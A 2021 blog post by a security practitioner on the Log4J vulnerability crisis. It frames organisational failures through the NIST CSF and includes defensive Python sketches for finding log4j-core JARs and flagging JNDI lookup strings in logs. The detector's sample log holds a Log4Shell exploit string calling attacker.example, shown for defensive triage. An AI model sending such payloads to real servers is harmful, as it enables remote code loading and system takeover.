On Log4J — The Duct Tape is Failing

Rafal Los
6 min read · Dec 20, 2021

Prologue

You’re probably not reading this when I release it. In fact, right now, if you’re a cyber security professional, the odds are high that you’re still running around sleepless and exhausted trying to keep up with the Log4J vulnerability (or vulnerabilities, rather) and the many places it could be in your organization.

I want you to know, I feel your pain. I’ve been there. That’s why I’m writing this. I used to work for a mega global company (you can verify that on my LinkedIn profile), and it was the same thing you’re experiencing right now. The difference is, my experience with this madness was in the early 2000s. It’s absolutely insane to me that very little has changed since then.

Reality Check

I probably don’t need to tell you that the world of IT is on fire right now. If you’re reading this in 6 months or more, that likely hasn’t changed much. There is a vulnerability in an open-source logging library used by basically every Java application on the planet that lets attacker-controlled log data trigger a remote lookup (JNDI) and load code, which turns into someone being able to remotely take control of a system.

Cue the klaxon and flashing red lights.

What is interesting to me, as someone who has been looking at the cyber security space from a strategy and process perspective, is that today’s disaster looks remarkably like the Heartbleed disaster back in 2014. Seriously, Heartbleed has its own web page and a Wikipedia entry. Open source library? Check. Critical component of hundreds of thousands of commercial and open-source software packages? Check! Cyber security teams that have no idea where, or if, it exists in their environments? Check! What makes this one even more of a dumpster fire is the seemingly never-ending stream of patches that don’t quite close the hole, plus the new exploits being released along the way.

This is truly a dumpster fire, filled with baby kittens, rolling down the hill into a gunpowder factory, next to a hospital. When people say it’s bad, it’s bad. It almost feels like we need to coin a new word because this one is soooooooo bad.

99 Problems

Here’s a non-exhaustive list of the problems I see in IT and cyber-security that are once again under the spotlight and microscope. I’m going to align these issues with the NIST CSF, since this is a common language everyone in our industry should speak.

  • Identify: Whether you’re advocating for the much-needed SBoM (Software Bill of Materials) or something much simpler like a usable asset inventory, one thing is clear: this is an emergency of epic proportions largely because many of the teams doing triage in enterprises cannot answer the fundamental question: “Are we vulnerable to this, and if so, where?” As a result we’re spending tremendous amounts of energy scanning, analyzing, and asking questions to determine where in our IT the Log4J libraries live (there’s a minimal scanning sketch after this list). Turns out, it’s in damn near everything from Minecraft (the game), to security tools, to everyday applications, to industrial platforms. Yikes doesn’t even begin to describe the pucker factor here. I would argue that the single biggest problem is that we have absolutely no definitive way of knowing the totality of our exposure, which is a terrible place to start.
  • Protect: This part should be simple. If there is a vulnerability in some web content platform, the first thing we should be able to do with relative ease is use our deployed Web Application Firewalls (WAFs) to at least stop the obvious exploit attempts and isolate where we’re being targeted (a naive pattern-matching sketch follows this list as well). What I’ve seen in various threads is two things going on: first, some organizations legitimately use the “extended capabilities” of Log4J that are basically causing the issue, so you can’t just block the behavior outright; second, WAFs aren’t as widely deployed as we’d like, or we don’t have adequate vendor responses and application of those emergency protections. I guess I’m not shocked by either development, but it’s not a great place to be.
  • Detect: Luckily, detection is rapidly evolving to meet the threat in the wild. Threat detection companies across a wide spectrum are building in detection for both the vulnerability and the exploit triggers, and we’re seeing them firing all over the place. Whatever the issue is, cyber security needs to collectively understand that we are in a detect-and-respond, or “assume breach”, or post-prevention world. If you’re still living under the misguided impression that you can do enough to prevent being breached, you’re a fool. I realize this applies to areas of the vendor space too, and I welcome a rebuttal. Oh, also, while I’m typing this, this happened: there may be a worm “ITW” (in the wild) as I type, and if this particular report isn’t completely real, one is surely imminent: https://twitter.com/Laughing_Mantis/status/1472785637006663683
  • Respond: What is your organization’s response plan? I’m seriously asking you to think about this, at three levels. First, the leadership level: how you communicate up to your business leadership and the board. We discussed this on The Above Board Show (shameless promotion) in a bit of detail, but it’s a difficult fact that many organizations’ CISOs are being summoned to the board room (virtually, probably) to answer “Are we impacted by this?” when in fact they should be proactively sending out communication that answers this and other questions, without being pulled away from the firefight. Second, the peer (horizontal) level: how does the CISO communicate with and muster his or her fellow leaders to create a consolidated response across IT? We all know cybersecurity isn’t going to fix this on their own; hell, security can’t even find the problems on their own, so they need the development and other IT teams to jump in and help. Effective communication is required here, and if you as a leader haven’t already built the channels and the communications framework, now is a terrible time to start, although if you’re starting from six feet down, it’s better than nothing. Effective communication with IT peers is vital, and you absolutely must figure it out, right now or never. Finally, the technical level: communication with vendors and various other third parties, and within the cybersecurity organization itself. Technical communication that is automated, documented, and well understood is critical to avoiding duplicated work and unnecessary waste. Additionally, response asks “Now what?” at both a strategy and a technical level. I could probably write a book on this, but won’t go too long here. What does your organization need to do, strategically and technically, to effectively communicate the issue, minimize exposure, remediate where possible, and continue to detect and respond as variants, new exploits, and whatever else pop up?
  • Recover: I feel confident saying that recovery isn’t part of many security organizations’ playbooks. Still, far too often, recovery means nuking the system and rebuilding it. Except when the impacted system is a business-critical production platform, you can’t just readily nuke it. Maybe you have gold images built (update them before re-deploying!), maybe you have other means, but do figure out recovery. This is going to be a long-term thing as this vulnerability fades into background Internet noise and you keep finding new, vulnerable, previously unknown Log4j implementations a year or more from now.
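To make the Identify problem concrete, here is a minimal sketch of the kind of ad-hoc scanning so many teams are doing right now. It’s Python, and it’s hypothetical: the paths, helper names, and scope are mine, not any vendor’s tool. It only catches two obvious cases, log4j-core JARs that carry their version in the filename and fat JARs that embed the vulnerable JndiLookup class, and whatever it finds still has to be compared against the current fixed release. It is a triage aid, not a substitute for a real inventory or SBoM.

```python
import re
import sys
from pathlib import Path
from zipfile import ZipFile, BadZipFile

# Hypothetical starting point -- point this at whatever filesystem you need to triage.
SCAN_ROOT = Path(sys.argv[1]) if len(sys.argv) > 1 else Path("/")

# Matches version-named artifacts like log4j-core-2.14.1.jar
JAR_NAME = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")


def find_log4j_jars(root: Path):
    """Yield (path, version-or-None) for every log4j-core JAR found under root."""
    for jar in root.rglob("*.jar"):
        match = JAR_NAME.search(jar.name)
        if match:
            yield jar, tuple(int(part) for part in match.groups())
            continue
        # Fat/uber JARs bundle log4j classes without the telltale filename,
        # so peek inside for the JndiLookup class as well.
        try:
            with ZipFile(jar) as zf:
                if any(name.endswith("JndiLookup.class") for name in zf.namelist()):
                    yield jar, None
        except (BadZipFile, PermissionError, OSError):
            continue


if __name__ == "__main__":
    for path, version in find_log4j_jars(SCAN_ROOT):
        label = ".".join(map(str, version)) if version else "unknown (embedded)"
        print(f"{path} -> log4j-core {label}")
```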
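And to make the Protect and Detect points concrete: below is a naive, hypothetical sketch (plain Python, not any particular WAF or SIEM rule language) of the kind of pattern matching that early emergency rules and log triage relied on, flagging the un-obfuscated ${jndi:...} lookup string in request data. Attackers obfuscate these payloads heavily (nested lookups like ${${lower:j}ndi:...}), which is exactly why this kind of matching is a stopgap while you patch, not a fix.

```python
import re

# Naive signature for the obvious exploit string. Real attacks are frequently
# obfuscated, so treat hits as triage signal and misses as inconclusive.
OBVIOUS_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns)://", re.IGNORECASE)


def flag_suspicious_lines(log_lines):
    """Return log lines containing the un-obfuscated Log4Shell lookup string."""
    return [line for line in log_lines if OBVIOUS_JNDI.search(line)]


if __name__ == "__main__":
    sample = [
        "GET / HTTP/1.1 User-Agent: ${jndi:ldap://attacker.example/a}",
        "GET /health HTTP/1.1 User-Agent: curl/7.79",
    ]
    for hit in flag_suspicious_lines(sample):
        print("possible exploit attempt:", hit)
```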

My apologies this went so long, but I’m watching colleagues burn through their weekends working, a catastrophic chain of events in getting Log4j patched, and so much buzz about an impending worm that I felt I needed to write this. It’s a disaster, for sure. But it’s a disaster we did not need to live through like this. This could have been avoided. We could be doing better, but we’re not. And I don’t have a lot of hope that the next time this happens, when some other open-source piece of software that’s critical to all software but maintained by a single person in Alaska or something is found to have a critically exploitable flaw, we will be in any better of a position.

What’s This About Duct Tape?

Where I’m going with the duct tape reference is that security organizations, in conjunction with the broader IT apparatus, have been held together with duct tape that is under increasing strain. Things work because people put in super-human effort and because the influx of disaster-level issues has been relatively low. You can see the toll this type of issue is taking on your peers’ faces, in their LinkedIn posts, and in their Twitter feeds, and it’s not just hitting cybersecurity folks. It’s hitting ALL of IT, and really striking at the business leadership level as well.

The duct tape that holds crisis response, incident handling, and today’s security together is failing… and I fear it’s going to have that zipper effect where the break accelerates the longer it runs, until eventually it all just falls apart. I know, it feels doomsday-ish, but we are close to full chaos and I don’t like how this feels. Please, tell me you think I’m wrong and it’s not that bad.

--

Rafal Los

I’m Rafal, and I’m a 20+ year veteran of the Cyber Security and technology space. I tend to think with a wide-angle lens, and am unapologetically no-bullsh*t.